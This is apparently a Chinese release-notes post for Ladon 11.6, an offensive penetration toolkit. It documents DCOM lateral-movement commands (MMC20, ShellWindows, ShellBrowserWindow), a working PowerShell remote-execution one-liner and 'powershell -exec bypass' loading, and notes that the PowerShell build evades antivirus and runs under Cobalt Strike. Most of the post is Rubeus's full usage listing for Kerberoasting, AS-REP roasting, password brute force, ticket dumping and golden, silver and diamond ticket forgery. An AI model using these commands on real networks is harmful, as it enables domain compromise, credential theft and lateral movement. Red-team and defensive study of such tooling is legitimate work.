Ladon11.6域渗透(Rubeus: Kerbero、GPO、TGT) Dcom横向移动(MMC、ShellW...

ivi

k8gege K8实验室 2023-09-11 09:11 发表于广西

Ladon 11.6 20230911

1. [+]MmcExec        Dcom远程执行命令之MMC20(域控或管理员权限、需目标关闭防火墙) 横向移动 内网渗透 支持BASE64命令
   
2. [+]ShellExec      Dcom远程执行命令之ShellWindows(域控或管理员权限、需目标关闭防火墙) 横向移动 内网渗透 支持BASE64命令
   
3. [+]ShellBrowserExec    Dcom远程执行命令之ShellBrowserWindow(域控或管理员权限、需目标关闭防火墙) 横向移动 内网渗透 支持BASE64命令
   
4. [+]SharpSphere      .NET>=4.0 SharpSphere 使红队人员能够轻松地与 vCenter 管理的虚拟机的来宾操作系统进行交互 执行命令
   
5. [+]noPac        .NET>=4.0 域渗透 域内提权CVE-2021-42287/CVE-2021-42278 横向移动 内网渗透
   
6. [+]SharpGPOAbuse    .NET>=4.0 域渗透 组策略(GPO)横向移动 内网渗透 下发脚本
   
7. [+]Rubeus           .NET>=4.0 域渗透 Kerberos攻击比如TGT请求/ST请求/AS-REP Roasting/Kerberoasting/委派攻击/黄金票据/白银票据/钻石票据/蓝宝石票据等
   
8. [u]LadonEXP        结果不含路径 也可自动解密
   
9. [u]PostShell      结果不含路径 也可自动解密
   
10. [u]web          AuthBasic认证监听 捕获密码 解密bug修复
    
11. [u]Ladon.ps1      默认使用Ladon40版本,Win10/11是主流系统，Win7可自行转换Ladon35
    
12. [u]Ladon.exe      默认使用Ladon48版本

复制代码

Ladon.ps1，PowerShell版免杀效果比exe更好，自行根据实际情况使用

0x001 Dcom远程执行命令之MMC20

Dcom执行条件:

1 域控或管理员权限

2 需目标关闭防火墙

PowerShell

1. [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","192.168.50.18")).Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/k calc.exe","Minimzed")

复制代码

Ladon MmcExec

1. Usage:
   
2. Ladon MmcExec host cmdline
   
3. Ladon MmcExec 127.0.0.1 calc
   
4. Ladon MmcExec 127.0.0.1 Y2FsYw==

复制代码

Ladon.ps1

1. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon MmcExec 127.0.0.1 calc
   
2. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon MmcExec 127.0.0.1 Y2FsYw==

复制代码

执行的命令包含双引号或其它特殊符号，特别是在CS或其它shell下使用，可以使用base64加密需要执行的cmd命令，如calc加密后Y2FsYw==

Cobalt Strike命令行用法与EXE版用法完全一致 (Ladon其它功能同理)

1. Ladon MmcExec 127.0.0.1 calc
   
2. Ladon MmcExec 127.0.0.1 Y2FsYw==

复制代码

0x002 Dcom远程执行命令之ShellWindows
Ladon ShellExec

1. Usage:
   
2. Ladon ShellExec host cmdline
   
3. Ladon ShellExec 127.0.0.1 calc
   
4. Ladon ShellExec 127.0.0.1 Y2FsYw==

复制代码

Ladon.ps1

1. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon ShellExec 127.0.0.1 calc
   
2. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon ShellExec 127.0.0.1 Y2FsYw==

复制代码

0x003 Dcom远程执行命令之ShellBrowserWindow

Ladon ShellBrowserExec

1. Usage:
   
2. Ladon ShellBrowserExec host cmdline
   
3. Ladon ShellBrowserExec 127.0.0.1 calc
   
4. Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

复制代码

Ladon.ps1

1. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon ShellBrowserExec 127.0.0.1 calc
   
2. powershell -exec bypass Import-Module .\Ladon.ps1;Ladon ShellBrowserExec 127.0.0.1 Y2FsYw==

复制代码

0x004   Rubeus域渗透 Kerberos攻击工具   [color=rgba(0, 0, 0, 0.9)]      
.NET>=4.0 域渗透 Kerberos攻击比如TGT请求/ST请求/AS-REP Roasting/Kerberoasting/委派攻击/黄金票据/白银票据/钻石票据/蓝宝石票据等

Ladon Rubeus

1. Load Rubeus
   
2. Rubeus v2.2.3
   
3. 
   
4. 
   
5. Ticket requests and renewals:
   
6. 
   
7.     Retrieve a TGT based on a user password/hash, optionally saving to a file or applying to the current logon session or a specific LUID:
   
8.         Ladon.exe Rubeus asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]
   
9. 
   
10.     Retrieve a TGT based on a user password/hash, start a /netonly process, and to apply the ticket to the new process/logon session:
    
11.         Ladon.exe Rubeus asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]
    
12. 
    
13.     Retrieve a TGT using a PCKS12 certificate, start a /netonly process, and to apply the ticket to the new process/logon session:
    
14.         Ladon.exe Rubeus asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]
    
15. 
    
16.     Retrieve a TGT using a certificate from the users keystore (Smartcard) specifying certificate thumbprint or subject, start a /netonly process, and to apply the ticket to the new process/logon session:
    
17.         Ladon.exe Rubeus asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]
    
18. 
    
19.     Request a TGT without sending pre-auth data:
    
20.         Ladon.exe Rubeus asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/principaltype:principal|enterprise|x500|srv_xhost|srv_host|srv_inst]
    
21. 
    
22.     Request a service ticket using an AS-REQ:
    
23.         Ladon.exe Rubeus asktgt /user:USER /service:SPN </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy]
    
24. 
    
25.     Retrieve a service ticket for one or more SPNs, optionally saving or applying the ticket:
    
26.         Ladon.exe Rubeus asktgs </ticket:BASE64 | /ticket:FILE.KIRBI> </service:SPN1,SPN2,...> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]
    
27. 
    
28.     Retrieve a service ticket using the Kerberos Key List Request options:
    
29.         Ladon.exe Rubeus asktgs /keyList /service:KRBTGT_SPN </ticket:BASE64 | /ticket:FILE.KIRBI> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]
    
30. 
    
31.     Renew a TGT, optionally applying the ticket, saving it, or auto-renewing the ticket up to its renew-till limit:
    
32.         Ladon.exe Rubeus renew </ticket:BASE64 | /ticket:FILE.KIRBI> [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/autorenew] [/nowrap]
    
33. 
    
34.     Perform a Kerberos-based password bruteforcing attack:
    
35.         Ladon.exe Rubeus brute </password:PASSWORD | /passwords:PASSWORDS_FILE> [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap]
    
36. 
    
37.     Perform a scan for account that do not require pre-authentication:
    
38.         Ladon.exe Rubeus preauthscan /users:C:\temp\users.txt [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/proxyurl:https://KDC_PROXY/kdcproxy]
    
39. 
    
40. 
    
41. Constrained delegation abuse:
    
42. 
    
43.     Perform S4U constrained delegation abuse:
    
44.         Ladon.exe Rubeus s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/proxyurl:https://KDC_PROXY/kdcproxy]
    
45.         Ladon.exe Rubeus s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy]
    
46. 
    
47.     Perform S4U constrained delegation abuse across domains:
    
48.         Ladon.exe Rubeus s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self] [/nopac]
    
49. 
    
50. 
    
51. Ticket Forgery:
    
52. 
    
53.     Forge a golden ticket using LDAP to gather the relevent information:
    
54.         Ladon.exe Rubeus golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/printcmd] [outfile:FILENAME] [/ptt]
    
55. 
    
56.     Forge a golden ticket using LDAP to gather the relevent information but explicitly overriding some values:
    
57.         Ladon.exe Rubeus golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> /ldap [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/netbios:NETBIOS_DOMAIN] [/sid:DOMAIN_SID] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/oldpac] [/extendedupndns] [/printcmd] [outfile:FILENAME] [/ptt]
    
58. 
    
59.     Forge a golden ticket, setting values explicitly:
    
60.         Ladon.exe Rubeus golden </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/oldpac] [/extendedupndns] [/printcmd] [outfile:FILENAME] [/ptt]
    
61. 
    
62.     Forge a golden ticket for a read only domain controller (for Key List Requests):
    
63.         Ladon.exe Rubeus golden </rodcNumber:RODC_NUM> </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/oldpac] [/extendedupndns] [/printcmd] [outfile:FILENAME] [/ptt]
    
64. 
    
65.     Forge a silver ticket using LDAP to gather the relevent information:
    
66.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]
    
67. 
    
68.     Forge a silver ticket using LDAP to gather the relevent information, using the KRBTGT key to calculate the KDCChecksum and TicketChecksum:
    
69.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap </krbkey:HASH> [/krbenctype:DES|RC4|AES128|AES256] [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]
    
70. 
    
71.     Forge a silver ticket using LDAP to gather the relevent information but explicitly overriding some values:
    
72.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/dc:DOMAIN_CONTROLLER] [/domain:DOMAIN] [/netbios:NETBIOS_DOMAIN] [/sid:DOMAIN_SID] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/authdata] [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]
    
73. 
    
74.     Forge a silver ticket using LDAP to gather the relevent information and including an S4UDelegationInfo PAC section:
    
75.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/s4uproxytarget:TARGETSPN] [/s4utransitedservices:SPN1,SPN2,...] [/printcmd] [outfile:FILENAME] [/ptt]
    
76. 
    
77.     Forge a silver ticket using LDAP to gather the relevent information and setting a different cname and crealm:
    
78.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> /ldap [/cname:CLIENTNAME] [/crealm:CLIENTDOMAIN] [/printcmd] [outfile:FILENAME] [/ptt]
    
79. 
    
80.     Forge a silver ticket, setting values explicitly:
    
81.         Ladon.exe Rubeus silver </des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> </user:USERNAME> </service:SPN> </domain:DOMAIN> </sid:DOMAIN_SID> [/dc:DOMAIN_CONTROLLER] [/netbios:NETBIOS_DOMAIN] [/dispalyname:PAC_FULL_NAME] [/badpwdcount:INTEGER] [/flags:TICKET_FLAGS] [/uac:UAC_FLAGS] [/groups:GROUP_IDS] [/pgid:PRIMARY_GID] [/homedir:HOMEDIR] [/homedrive:HOMEDRIVE] [/id:USER_ID] [/logofftime:LOGOFF_TIMESTAMP] [/lastlogon:LOGON_TIMESTAMP] [/logoncount:INTEGER] [/passlastset:PASSWORD_CHANGE_TIMESTAMP] [/maxpassage:RELATIVE_TO_PASSLASTSET] [/minpassage:RELATIVE_TO_PASSLASTSET] [/profilepath:PROFILE_PATH] [/scriptpath:LOGON_SCRIPT_PATH] [/sids:EXTRA_SIDS] [[/resourcegroupsid:RESOURCEGROUPS_SID] [/resourcegroups:GROUP_IDS]] [/authtime:AUTH_TIMESTAMP] [/starttime:Start_TIMESTAMP] [/endtime:RELATIVE_TO_STARTTIME] [/renewtill:RELATIVE_TO_STARTTIME] [/rangeend:RELATIVE_TO_STARTTIME] [/rangeinterval:RELATIVE_INTERVAL] [/authdata] [/cname:CLIENTNAME] [/crealm:CLIENTDOMAIN] [/s4uproxytarget:TARGETSPN] [/s4utransitedservices:SPN1,SPN2,...] [/extendedupndns] [/nofullpacsig] [/printcmd] [outfile:FILENAME] [/ptt]
    
82. 
    
83.     Forge a diamond TGT by requesting a TGT based on a user password/hash:
    
84.         Ladon.exe Rubeus diamond /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/createnetonly:C:\Windows\System32\cmd.exe] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]
    
85. 
    
86.     Forge a diamond TGT by requesting a TGT using a PCKS12 certificate:
    
87.         Ladon.exe Rubeus diamond /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> [/createnetonly:C:\Windows\System32\cmd.exe] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]
    
88. 
    
89.      Forge a diamond TGT by requesting a TGT using tgtdeleg:
    
90.         Ladon.exe Rubeus diamond /tgtdeleg [/createnetonly:C:\Windows\System32\cmd.exe] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/krbkey:HASH] [/ticketuser:USERNAME] [/ticketuserid:USER_ID] [/groups:GROUP_IDS] [/sids:EXTRA_SIDS]
    
91. 
    
92. 
    
93. Ticket management:
    
94. 
    
95.     Submit a TGT, optionally targeting a specific LUID (if elevated):
    
96.         Ladon.exe Rubeus ptt </ticket:BASE64 | /ticket:FILE.KIRBI> [/luid:LOGINID]
    
97. 
    
98.     Purge tickets from the current logon session, optionally targeting a specific LUID (if elevated):
    
99.         Ladon.exe Rubeus purge [/luid:LOGINID]
    
100. 
     
101.     Parse and describe a ticket (service ticket or TGT):
     
102.         Ladon.exe Rubeus describe </ticket:BASE64 | /ticket:FILE.KIRBI> [/servicekey:HASH] [/krbkey:HASH] [/asrepkey:HASH] [/serviceuser:USERNAME] [/servicedomain:DOMAIN]
     
103. 
     
104. 
     
105. Ticket extraction and harvesting:
     
106. 
     
107.     Triage all current tickets (if elevated, list for all users), optionally targeting a specific LUID, username, or service:
     
108.         Ladon.exe Rubeus triage [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]
     
109. 
     
110.     List all current tickets in detail (if elevated, list for all users), optionally targeting a specific LUID:
     
111.         Ladon.exe Rubeus klist [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM]
     
112. 
     
113.     Dump all current ticket data (if elevated, dump for all users), optionally targeting a specific service/LUID:
     
114.         Ladon.exe Rubeus dump [/luid:LOGINID] [/user:USER] [/service:krbtgt] [/server:BLAH.DOMAIN.COM] [/nowrap]
     
115. 
     
116.     Retrieve a usable TGT .kirbi for the current user (w/ session key) without elevation by abusing the Kerberos GSS-API, faking delegation:
     
117.         Ladon.exe Rubeus tgtdeleg [/target:SPN]
     
118. 
     
119.     Monitor every /interval SECONDS (default 60) for new TGTs:
     
120.         Ladon.exe Rubeus monitor [/interval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]
     
121. 
     
122.     Monitor every /monitorinterval SECONDS (default 60) for new TGTs, auto-renew TGTs, and display the working cache every /displayinterval SECONDS (default 1200):
     
123.         Ladon.exe Rubeus harvest [/monitorinterval:SECONDS] [/displayinterval:SECONDS] [/targetuser:USER] [/nowrap] [/registry:SOFTWARENAME] [/runfor:SECONDS]
     
124. 
     
125. 
     
126. Roasting:
     
127. 
     
128.     Perform Kerberoasting:
     
129.         Ladon.exe Rubeus kerberoast [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]
     
130. 
     
131.     Perform Kerberoasting, outputting hashes to a file:
     
132.         Ladon.exe Rubeus kerberoast /outfile:hashes.txt [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps]
     
133. 
     
134.     Perform Kerberoasting, outputting hashes in the file output format, but to the console:
     
135.         Ladon.exe Rubeus kerberoast /simple [[/spn:"blah/blah"] | [/spns:C:\temp\spns.txt]] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]
     
136. 
     
137.     Perform Kerberoasting with alternate credentials:
     
138.         Ladon.exe Rubeus kerberoast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]
     
139. 
     
140.     Perform Kerberoasting with an existing TGT:
     
141.         Ladon.exe Rubeus kerberoast </spn:"blah/blah" | /spns:C:\temp\spns.txt> </ticket:BASE64 | /ticket:FILE.KIRBI> [/nowrap]
     
142. 
     
143.     Perform Kerberoasting with an existing TGT using an enterprise principal:
     
144.         Ladon.exe Rubeus kerberoast </spn:user@domain.com | /spns:user1@domain.com,user2@domain.com> /enterprise </ticket:BASE64 | /ticket:FILE.KIRBI> [/nowrap]
     
145. 
     
146.     Perform Kerberoasting with an existing TGT and automatically retry with the enterprise principal if any fail:
     
147.         Ladon.exe Rubeus kerberoast </ticket:BASE64 | /ticket:FILE.KIRBI> /autoenterprise [/ldaps] [/nowrap]
     
148. 
     
149.     Perform Kerberoasting using the tgtdeleg ticket to request service tickets - requests RC4 for AES accounts:
     
150.         Ladon.exe Rubeus kerberoast /usetgtdeleg [/ldaps] [/nowrap]
     
151. 
     
152.     Perform "opsec" Kerberoasting, using tgtdeleg, and filtering out AES-enabled accounts:
     
153.         Ladon.exe Rubeus kerberoast /rc4opsec [/ldaps] [/nowrap]
     
154. 
     
155.     List statistics about found Kerberoastable accounts without actually sending ticket requests:
     
156.         Ladon.exe Rubeus kerberoast /stats [/ldaps] [/nowrap]
     
157. 
     
158.     Perform Kerberoasting, requesting tickets only for accounts with an admin count of 1 (custom LDAP filter):
     
159.         Ladon.exe Rubeus kerberoast /ldapfilter:'admincount=1' [/ldaps] [/nowrap]
     
160. 
     
161.     Perform Kerberoasting, requesting tickets only for accounts whose password was last set between 01-31-2005 and 03-29-2010, returning up to 5 service tickets:
     
162.         Ladon.exe Rubeus kerberoast /pwdsetafter:01-31-2005 /pwdsetbefore:03-29-2010 /resultlimit:5 [/ldaps] [/nowrap]
     
163. 
     
164.     Perform Kerberoasting, with a delay of 5000 milliseconds and a jitter of 30%:
     
165.         Ladon.exe Rubeus kerberoast /delay:5000 /jitter:30 [/ldaps] [/nowrap]
     
166. 
     
167.     Perform AES Kerberoasting:
     
168.         Ladon.exe Rubeus kerberoast /aes [/ldaps] [/nowrap]
     
169. 
     
170.     Perform Kerberoasting using an account without pre-auth by sending AS-REQ's:
     
171.         Ladon.exe Rubeus kerberoast </spn:"blah/blah" | /spns:C:\temp\spns.txt> /nopreauth:USER /domain:DOMAIN [/dc:DOMAIN_CONTROLLER] [/nowrap]
     
172. 
     
173.     Perform AS-REP "roasting" for any users without preauth:
     
174.         Ladon.exe Rubeus asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps] [/nowrap]
     
175. 
     
176.     Perform AS-REP "roasting" for any users without preauth, outputting Hashcat format to a file:
     
177.         Ladon.exe Rubeus asreproast /outfile:hashes.txt /format:hashcat [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] [/ldaps]
     
178. 
     
179.     Perform AS-REP "roasting" for any users without preauth using alternate credentials:
     
180.         Ladon.exe Rubeus asreproast /creduser:DOMAIN.FQDN\USER /credpassword:PASSWORD [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU,..."] [/ldaps] [/nowrap]
     
181. 
     
182.     Perform AES AS-REP "roasting":
     
183.         Ladon.exe Rubeus asreproast [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] /aes [/ldaps] [/nowrap]
     
184. 
     
185. 
     
186. Miscellaneous:
     
187. 
     
188.     Create a hidden program (unless /show is passed) with random (or user-defined) /netonly credentials, displaying the PID and LUID:
     
189.         Ladon.exe Rubeus createnetonly /program:"C:\Windows\System32\cmd.exe" [/show] [/username:USERNAME] [/domain:DOMAIN] [/password:PASSWORD]
     
190. 
     
191.     Reset a user's password from a supplied TGT (AoratoPw):
     
192.         Ladon.exe Rubeus changepw </ticket:BASE64 | /ticket:FILE.KIRBI> /new:PASSWORD [/dc:DOMAIN_CONTROLLER] [/targetuser:DOMAIN\USERNAME]
     
193. 
     
194.     Calculate rc4_hmac, aes128_cts_hmac_sha1, aes256_cts_hmac_sha1, and des_cbc_md5 hashes:
     
195.         Ladon.exe Rubeus hash /password:X [/user:USER] [/domain:DOMAIN]
     
196. 
     
197.     Substitute an sname or SPN into an existing service ticket:
     
198.         Ladon.exe Rubeus tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:ldap [/srealm:DOMAIN] [/ptt] [/luid] [/nowrap]
     
199.         Ladon.exe Rubeus tgssub </ticket:BASE64 | /ticket:FILE.KIRBI> /altservice:cifs/computer.domain.com [/srealm:DOMAIN] [/ptt] [/luid] [/nowrap]
     
200. 
     
201.     Display the current user's LUID:
     
202.         Ladon.exe Rubeus currentluid
     
203. 
     
204.     Display information about the (current) or (target) logon session, default all readable:
     
205.         Ladon.exe Rubeus logonsession [/current] [/luid:X]
     
206. 
     
207.     The "/consoleoutfile:C:\FILE.txt" argument redirects all console output to the file specified.
     
208. 
     
209.     The "/nowrap" flag prevents any base64 ticket blobs from being column wrapped for any function.
     
210. 
     
